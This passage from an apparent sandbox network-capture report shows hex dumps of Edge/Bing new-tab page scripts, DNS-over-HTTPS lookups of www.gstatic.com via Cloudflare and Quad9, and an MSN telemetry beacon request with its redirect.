                                                                                                                                                                  2025-01-11 06:54:30 UTC16259INData Raw: 50 49 41 75 74 6f 53 75 67 67 65 73 74 69 6f 6e 73 3d 21 31 2c 74 68 69 73 2e 69 73 49 6e 70 75 74 46 6f 63 75 73 65 64 3d 21 31 2c 74 68 69 73 2e 61 63 74 69 6f 6e 45 6c 65 6d 65 6e 74 46 6f 63 75 73 65 64 3d 21 31 2c 74 68 69 73 2e 73 65 61 72 63 68 42 6f 78 54 65 6c 65 6d 65 74 72 79 54 61 67 73 3d 22 22 2c 74 68 69 73 2e 62 75 74 74 6f 6e 54 65 6c 65 6d 65 74 72 79 54 61 67 3d 22 22 2c 74 68 69 73 2e 64 65 65 70 53 65 61 72 63 68 42 75 74 74 6f 6e 54 65 6c 65 6d 65 74 72 79 54 61 67 3d 22 22 2c 74 68 69 73 2e 69 6e 70 75 74 54 65 6c 65 6d 65 74 72 79 54 61 67 3d 22 22 2c 74 68 69 73 2e 73 65 6c 65 63 74 42 6f 78 4f 70 74 69 6f 6e 54 65 6c 65 6d 65 74 72 79 54 61 67 3d 22 22 2c 74 68 69 73 2e 76 61 6c 75 65 3d 22 22 2c 74 68 69 73 2e 73 65 61 72 63 68
                                                                                                                                                                  Data Ascii: PIAutoSuggestions=!1,this.isInputFocused=!1,this.actionElementFocused=!1,this.searchBoxTelemetryTags="",this.buttonTelemetryTag="",this.deepSearchButtonTelemetryTag="",this.inputTelemetryTag="",this.selectBoxOptionTelemetryTag="",this.value="",this.search
                                                                                                                                                                  2025-01-11 06:54:30 UTC16384INData Raw: 73 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 68 6f 77 43 6f 64 65 78 42 69 6e 67 41 53 55 70 73 65 6c 6c 26 26 28 74 68 69 73 2e 62 69 6e 67 41 53 55 70 73 65 6c 6c 54 65 6c 65 6d 65 74 72 79 54 61 67 3d 6e 65 77 20 70 2e 44 28 7b 6e 61 6d 65 3a 22 73 65 61 72 63 68 5f 62 69 6e 67 41 53 55 70 73 65 6c 6c 22 2c 62 65 68 61 76 69 6f 72 3a 6c 2e 77 75 2e 4e 61 76 69 67 61 74 65 2c 61 63 74 69 6f 6e 3a 6c 2e 41 77 2e 43 6c 69 63 6b 2c 63 6f 6e 74 65 6e 74 3a 7b 74 79 70 65 3a 6c 2e 75 48 2e 50 61 72 74 6e 65 72 4c 69 6e 6b 73 2c 68 65 61 64 6c 69 6e 65 3a 22 43 6f 64 65 78 20 42 69 6e 67 20 4c 69 6e 6b 22 7d 2c 6f 76 65 72 72 69 64 65 44 65 73 74 69 6e 61 74 69 6f 6e 55 72 6c 3a 22 62 69 6e 67 43 68 61 74 22 7d 29 2e 67 65 74 4d 65 74 61 64 61 74 61 54
                                                                                                                                                                  Data Ascii: s&&this.options.showCodexBingASUpsell&&(this.bingASUpsellTelemetryTag=new p.D({name:"search_bingASUpsell",behavior:l.wu.Navigate,action:l.Aw.Click,content:{type:l.uH.PartnerLinks,headline:"Codex Bing Link"},overrideDestinationUrl:"bingChat"}).getMetadataT
                                                                                                                                                                  2025-01-11 06:54:30 UTC1376INData Raw: 68 66 72 6d 7b 77 69 64 74 68 3a 34 30 30 70 78 7d 2e 63 6f 72 65 2c 23 73 77 5f 61 73 7b 77 69 64 74 68 3a 33 34 30 70 78 7d 7d 24 7b 28 30 2c 45 2e 65 48 29 28 45 2e 4b 24 2e 63 33 29 7d 7b 23 73 72 63 68 66 72 6d 7b 77 69 64 74 68 3a 35 32 38 70 78 7d 2e 63 6f 72 65 2c 23 73 77 5f 61 73 7b 77 69 64 74 68 3a 34 36 38 70 78 7d 7d 24 7b 28 30 2c 45 2e 76 57 29 28 45 2e 4b 24 2e 63 34 2c 6e 75 6c 6c 29 7d 7b 23 73 72 63 68 66 72 6d 7b 77 69 64 74 68 3a 37 36 30 70 78 7d 2e 63 6f 72 65 2c 23 73 77 5f 61 73 7b 77 69 64 74 68 3a 37 30 30 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 34 38 30 70 78 29 7b 2e 63 6f 72 65 2c 23 73 77 5f 61 73 7b 77 69 64 74 68 3a 33 34 33 70 78 7d 7d 60 29 29 2c 65 65 3d 55 2e 69 60 0a 66 6f 72 6d 2e 61 75 74
                                                                                                                                                                  Data Ascii: hfrm{width:400px}.core,#sw_as{width:340px}}${(0,E.eH)(E.K$.c3)}{#srchfrm{width:528px}.core,#sw_as{width:468px}}${(0,E.vW)(E.K$.c4,null)}{#srchfrm{width:760px}.core,#sw_as{width:700px}}@media (max-width:480px){.core,#sw_as{width:343px}}`)),ee=U.i`form.aut
                                                                                                                                                                  2025-01-11 06:54:30 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 29 28 29 3f 47 2e 59 50 2e 66 6f 72 63 65 64 43 6f 6c 6f 72 4c 69 6e 6b 3a 47 2e 59 50 2e 73 65 6c 65 63 74 65 64 42 61 63 6b 67 72 6f 75 6e 64 7d 7d 23 73 77 5f 61 73 20 3e 20 2e 73 61 5f 61 73 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 6e 6f 6e 65 7d 23 73 77 5f 61 73 20 23 73 61 5f 75 6c 3a 6e 6f 74 28 3a 65 6d 70 74 79 29 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 24 7b 28 30 2c 49 2e 59 29 28 29 3f 47 2e 59 50 2e 66 6f 72 63 65 64 43 6f 6c 6f 72 4c 69 6e 6b 3a 47 2e 59 50 2e 73 65 6c 65 63 74 65 64 42 61 63 6b 67 72 6f 75 6e 64 7d 7d 40 2d 6d 6f 7a 2d 64 6f 63 75 6d 65 6e 74 20 75 72 6c 2d 70 72 65 66 69 78 28 29 7b 2e 63 6f 72 65 20 2e 73 65 61 72 63 68 2d 62 74 6e 3a 3a 70 61 72 74 28 63 6f 6e 74 72 6f 6c 29 7b 62
                                                                                                                                                                  Data Ascii: 00004000)()?G.YP.forcedColorLink:G.YP.selectedBackground}}#sw_as > .sa_as{border-top:none}#sw_as #sa_ul:not(:empty){border:1px solid ${(0,I.Y)()?G.YP.forcedColorLink:G.YP.selectedBackground}}@-moz-document url-prefix(){.core .search-btn::part(control){b
                                                                                                                                                                  2025-01-11 06:54:30 UTC12INData Raw: 72 7b 63 6f 6c 6f 72 3a 23 46 0d 0a
                                                                                                                                                                  Data Ascii: r{color:#F
                                                                                                                                                                  2025-01-11 06:54:30 UTC4687INData Raw: 30 30 30 30 31 32 34 33 0d 0a 39 46 39 46 39 7d 2e 62 69 6e 67 2d 61 73 2d 75 70 73 65 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 39 32 39 32 39 7d 2e 63 62 61 73 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 34 37 39 45 46 35 7d 23 73 73 5f 74 61 62 5f 67 68 6f 73 74 20 2e 73 73 5f 74 61 62 5f 62 74 6e 7b 63 6f 6c 6f 72 3a 23 42 45 42 42 42 38 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 42 45 42 42 42 38 7d 23 73 63 68 6d 73 6e 5f 73 73 62 74 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 30 2e 31 35 29 3b 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 23 73 63 68 6d 73 6e 5f 73 73 62 74 6e 3a 68 6f 76 65 72 2c 23 73 63 68 6d 73 6e 5f 73 73 62 74 6e 3a 66 6f
                                                                                                                                                                  Data Ascii: 000012439F9F9}.bing-as-upsell-container{background:#292929}.cbas-link{color:#479EF5}#ss_tab_ghost .ss_tab_btn{color:#BEBBB8;border:1px solid #BEBBB8}#schmsn_ssbtn{background-color:rgba(255,255,255,0.15);color:#FFFFFF}#schmsn_ssbtn:hover,#schmsn_ssbtn:fo
                                                                                                                                                                  2025-01-11 06:54:30 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 24 7b 28 65 2c 74 29 3d 3e 65 2e 6f 6e 56 6f 69 63 65 53 65 61 72 63 68 43 6c 69 63 6b 28 74 2e 65 76 65 6e 74 29 7d 20 40 6b 65 79 70 72 65 73 73 3d 24 7b 28 65 2c 74 29 3d 3e 65 2e 6f 6e 56 6f 69 63 65 53 65 61 72 63 68 43 6c 69 63 6b 28 74 2e 65 76 65 6e 74 29 7d 3e 24 7b 6b 65 2e 64 79 2e 70 61 72 74 69 61 6c 28 42 65 28 29 29 7d 3c 2f 62 75 74 74 6f 6e 3e 60 2c 4b 65 3d 6b 65 2e 64 79 60 20 24 7b 65 3d 3e 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 20 65 2e 6f 70 74 69 6f 6e 73 26 26 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 65 2e 6f 70 74 69 6f 6e 73 2e 63 68 69 6c 64 45 78 70 65 72 69 65 6e 63 65 52 65 66 65 72 65 6e 63 65 73 57 43 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 56 6f 69 63 65 53 65 61 72 63 68
                                                                                                                                                                  Data Ascii: 00004000${(e,t)=>e.onVoiceSearchClick(t.event)} @keypress=${(e,t)=>e.onVoiceSearchClick(t.event)}>${ke.dy.partial(Be())}</button>`,Ke=ke.dy` ${e=>{var t;return e.options&&(null===(t=e.options.childExperienceReferencesWC)||void 0===t?void 0:t.VoiceSearch
                                                                                                                                                                  2025-01-11 06:54:30 UTC12INData Raw: 67 28 29 29 7d 7d 22 3e 24 7b 0d 0a
                                                                                                                                                                  Data Ascii: g())}}">${
                                                                                                                                                                  2025-01-11 06:54:30 UTC16384INData Raw: 30 30 30 31 38 30 30 30 0d 0a 65 3d 3e 28 30 2c 64 2e 76 79 29 28 65 2e 70 72 6f 76 69 64 65 72 4e 61 6d 65 29 7d 3c 2f 61 3e 3c 2f 64 69 76 3e 60 29 7d 3c 2f 64 69 76 3e 60 2c 68 3d 65 3d 3e 65 2e 68 69 64 65 41 64 4c 61 62 65 6c 41 6e 64 41 64 43 68 6f 69 63 65 3f 22 61 64 2d 73 6c 75 67 2d 65 78 74 65 6e 64 65 64 22 3a 22 22 2c 75 3d 65 3d 3e 65 2e 65 6e 61 62 6c 65 42 6c 65 6e 64 49 6e 41 64 53 6c 75 67 53 74 79 6c 65 3f 22 62 6c 65 6e 64 2d 69 6e 2d 61 64 2d 73 6c 75 67 22 3a 22 22 2c 6d 3d 28 65 2c 74 29 3d 3e 7b 73 77 69 74 63 68 28 65 2e 65 6e 61 62 6c 65 42 6c 65 6e 64 49 6e 41 64 53 6c 75 67 53 74 79 6c 65 29 7b 63 61 73 65 20 32 3a 63 61 73 65 20 33 3a 63 61 73 65 20 34 3a 72 65 74 75 72 6e 22 22 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 28
                                                                                                                                                                  Data Ascii: 00018000e=>(0,d.vy)(e.providerName)}</a></div>`)}</div>`,h=e=>e.hideAdLabelAndAdChoice?"ad-slug-extended":"",u=e=>e.enableBlendInAdSlugStyle?"blend-in-ad-slug":"",m=(e,t)=>{switch(e.enableBlendInAdSlugStyle){case 2:case 3:case 4:return"";default:return(


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  7192.168.11.2059134162.159.61.3443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:30 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  2025-01-11 06:54:30 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                  2025-01-11 06:54:30 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:30 GMT
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                  CF-RAY: 9002fef2dda261c5-ORD
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  2025-01-11 06:54:30 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 a3 00 04 8e fa be 23 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcom#)


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  8192.168.11.20600589.9.9.9443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:30 UTC233OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                  Host: dns.quad9.net
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  2025-01-11 06:54:30 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                  2025-01-11 06:54:30 UTC181INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:30 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Content-Length: 60
                                                                                                                                                                  Server: h2o/dnsdist
                                                                                                                                                                  content-type: application/dns-message
                                                                                                                                                                  cache-control: max-age=8
                                                                                                                                                                  2025-01-11 06:54:30 UTC60INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 08 00 04 8e fa bf a3 00 00 29 02 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcom)


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  9192.168.11.2051548162.159.61.3443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:30 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  2025-01-11 06:54:30 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                  2025-01-11 06:54:30 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:30 GMT
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                  CF-RAY: 9002fef2dff713a5-ORD
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  2025-01-11 06:54:30 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f7 00 04 8e fa be 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcomC)


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  10192.168.11.2052387162.159.61.3443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:30 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  2025-01-11 06:54:30 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                  2025-01-11 06:54:30 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:30 GMT
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                  CF-RAY: 9002fef2de8389f7-ORD
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  2025-01-11 06:54:30 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 b2 00 04 ac d9 02 23 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcom#)


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  11192.168.11.20634579.9.9.9443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:30 UTC233OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                  Host: dns.quad9.net
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  2025-01-11 06:54:30 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                  2025-01-11 06:54:30 UTC181INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:30 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Content-Length: 60
                                                                                                                                                                  Server: h2o/dnsdist
                                                                                                                                                                  content-type: application/dns-message
                                                                                                                                                                  cache-control: max-age=8
                                                                                                                                                                  2025-01-11 06:54:30 UTC60INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 08 00 04 8e fa bf a3 00 00 29 02 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcom)


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  12192.168.11.20538739.9.9.9443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:30 UTC233OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                  Host: dns.quad9.net
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                  2025-01-11 06:54:30 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                  2025-01-11 06:54:30 UTC181INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:30 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Content-Length: 60
                                                                                                                                                                  Server: h2o/dnsdist
                                                                                                                                                                  content-type: application/dns-message
                                                                                                                                                                  cache-control: max-age=8
                                                                                                                                                                  2025-01-11 06:54:30 UTC60INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 08 00 04 8e fa bf a3 00 00 29 02 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: wwwgstaticcom)


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  13192.168.11.205173120.125.209.212443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:32 UTC1152OUTGET /c.gif?rnd=1736578471573&udc=true&pg.n=FRE&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26firstlaunch%3D1&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=f7b66e0f99774ee4994a9572d133a3c9&activityId=f7b66e0f99774ee4994a9572d133a3c9&d.imd=false&scr=1024x768&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
                                                                                                                                                                  Host: c.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: _C_ETH=1; USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1
                                                                                                                                                                  2025-01-11 06:54:32 UTC1096INHTTP/1.1 302 Redirect
                                                                                                                                                                  Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Location: https://c.bing.com/c.gif?rnd=1736578471573&udc=true&pg.n=FRE&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26firstlaunch%3D1&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=f7b66e0f99774ee4994a9572d133a3c9&activityId=f7b66e0f99774ee4994a9572d133a3c9&d.imd=false&scr=1024x768&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=1FE748FF748B4324A916C66DF435B563&RedC=c.msn.com&MXFR=0136911D054E6BFC0E90846C04216AB7
                                                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                  P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                  Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
